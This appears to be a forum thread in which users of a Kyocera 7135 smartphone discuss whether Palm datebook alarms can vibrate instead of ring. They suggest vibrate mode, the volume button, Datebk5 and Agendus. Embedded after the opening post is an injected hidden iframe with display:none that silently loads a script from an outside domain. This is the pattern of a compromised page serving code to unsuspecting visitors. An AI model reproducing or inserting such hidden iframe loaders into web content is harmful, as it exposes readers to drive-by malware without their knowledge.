+ Reply to Thread

Viabration On Palm alarms

Is it possible to setup that the phone should viabrate instead of ringinig for the alarm in the palm datebook, I see how to setup the incoming call viabration but for the alarm I see no indication for this.

If there is no such option for the palm datebook does anyone know of a 3rd party app that could do this.

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I believe the 2 are tied together. If I'm not mistaken, when the phone is set to vibrate, the datebook reminders vibrate also.
    The 7135 is a marathon, not a Sprint

Re: Viabration On Palm alarms

Originally posted by baumsh
    Is it possible to setup that the phone should viabrate instead of ringinig for the alarm in the palm datebook, I see how to setup the incoming call viabration but for the alarm I see no indication for this.

If there is no such option for the palm datebook does anyone know of a 3rd party app that could do this.

Thanks
    I entered Alarm Vibrate in the search feature and found this thread that may help you.
    http://www.smartphonesource.com/vbul...=alarm+vibrate
    If at first you don't succeed, don't try sky diving.

Originally posted by ALooneyGuy
    I believe the 2 are tied together. If I'm not mistaken, when the phone is set to vibrate, the datebook reminders vibrate also.
    This is true for most apps, but apparently older versions of datebk and actionnames don't work.

Found out that Agendus (Action Names new Name) version 6.2 does alarm and vibrate. The datebook that came installed on the 7135 alarms as well.
    If at first you don't succeed, don't try sky diving.

Stever, Unfortenatly I don't see there anything that could help, in this tread nobody had come up how to get it to work, and the maClock app mentiond is not usfull for my requirements.

To AloonyGuy, unfortunaly this is not the case.

Something strange is happening here. I tried setting the ringer to vibrate on mine, and the datebook alarms also went into vibrate mode. Maybe, as Steve suggested, there are different versions of Datebk...?

I have the reguler Date book v4 that came from Kyocera, and I went to the general setting in the pda pref, and for alarm I have to set for low, and for incoming calls is set to Viabrate only, could please specify your settings?

Thanks

I use Datebk5 and my alarms do vibrate. The only sound setting I bother with is the volume button on the side of the phone. I press it down until it says "Silent Mode is On" and gives a quick vibrate.

I use version 4, and do the same thing jacqlynn42 does. I just press the volume down button on the side of the phone until it goes into vibrate mode, and from that point forward, datebook alarms vibrate for me.